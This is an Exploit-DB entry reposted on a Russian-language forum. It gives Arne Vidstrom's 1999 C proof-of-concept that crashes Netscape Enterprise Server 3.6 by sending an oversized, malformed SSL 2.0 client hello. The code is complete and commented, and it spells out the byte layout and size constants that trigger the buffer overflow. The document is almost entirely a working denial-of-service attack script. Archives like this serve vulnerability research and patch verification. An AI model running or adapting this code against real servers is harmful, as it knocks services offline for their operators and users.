Exploit Netscape Enterprise Server 3.6 - SSL Buffer Overflow (Denial of Service) (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19416
Проверка EDB
  1. Пройдено
Автор
ARNE VIDSTROM
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-1999-0752
Дата публикации
1999-07-06
Netscape Enterprise Server 3.6 - SSL Buffer Overflow (Denial of Service) (PoC)
C:
/*
source: https://www.securityfocus.com/bid/516/info

Netscape's Enterprise Server suffers from a buffer overflow error in the SSL handshaking code that causes it to crash when the buffer is overrun. 
*/

//
// nesexploit.c - v1.02 - by Arne Vidstrom, [email protected]
//
// This program crashes Netscape Enterprise Server when it is
// running in SSL mode, by exploiting a bug in the SSL handshake
// code. The server crashes if the client:
//
//  * starts with SSL 2.0 format
//  * uses long record header
//  * uses padding >= 8
//  * sends at least 11 bytes more data than it specifies in the
//    header
//  * sends at least about 4 kb data
//
// I haven't included any error handling in the code because it's
// so boring to write... ;o)
//

#include <winsock.h>
#include <string.h>
#include <stdio.h>

#define sockaddr_in struct sockaddr_in
#define sockaddr struct sockaddr

// Some combinations of these three constants will crash the server,
// others will not.

#define PADDING 8
#define SPECIFIED_SIZE 11822
#define ACTUAL_SIZE 11833

void main(void)
{
      // IP address of the server - set to your own server and nobody
      // elses :o)
      char ipaddr[25] = "xxx.xxx.xxx.xxx";

      // SSL port
      unsigned short port = xxxxx;

      SOCKET socket1;
      unsigned char s[65536];
      int errorCode;
      WSADATA winSockData;
      sockaddr_in peer;
      int result;
      unsigned char i;
      unsigned int l;
      int flags;

      printf("\nnesexploit.c - developed by Arne Vidstrom, [email protected]\n\n");

      // Allocate a socket, connect and stuff...
      errorCode = WSAStartup(0x0101, &winSockData);
      socket1 = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
      peer.sin_family = AF_INET;
      peer.sin_port = htons(port);
      peer.sin_addr.s_addr = inet_addr(ipaddr);
      for (i = 0; i < 8; i++)
              peer.sin_zero[i] = 0;
      result = connect(socket1, (sockaddr *) &peer, sizeof(peer));
      if (result != 0)
              printf("Ehmn, where's that server? ;o)\n\n");

      // Initialize the buffer with a lot of '.' Anything would do...
      for (l=0; l<65536; l++)
              s[l] = '.';

      // Version 2.0 Format Header with padding.
      // Shouldn't be any padding because this part is not encrypted,
      // but without padding the server won't crash. :o)
      s[0] = (SPECIFIED_SIZE & 0xff00) >> 8;
      s[1] = (SPECIFIED_SIZE & 0x00ff);
      s[2] = PADDING;

      // Client says Hello!
      s[3] = 0x01;

      // Client wishes to use Version 3.0 later (there will be no "later" though...)
      s[4] = 0x03;
      s[5] = 0x00;

      // Cipher Specs Length = 3
      s[6] = 0x00;
      s[7] = 0x0c;

      // Session ID = 0
      s[8] = 0x00;
      s[9] = 0x00;

      // Challenge Length = 16
      s[10] = 0x00;
      s[11] = 0x10;

      // Challenge Specs Data
      s[12] = 0x02;
      s[13] = 0x00;
      s[14] = 0x80;

      s[15] = 0x04;
      s[16] = 0x00;
      s[17] = 0x80;

      s[18] = 0x00;
      s[19] = 0x00;
      s[20] = 0x03;

      s[21] = 0x00;
      s[22] = 0x00;
      s[23] = 0x06;

      // Challenge Data is a few '.' from above

      // The rest is also '.' from above

      // Send all this to the server
      flags = 0;
      result = send(socket1, s, ACTUAL_SIZE, flags);
      if (result != SOCKET_ERROR)
              printf("Done!\n\n");

      // Clean up
      closesocket(socket1);
      WSACleanup();
}
 
Источник
www.exploit-db.com

Похожие темы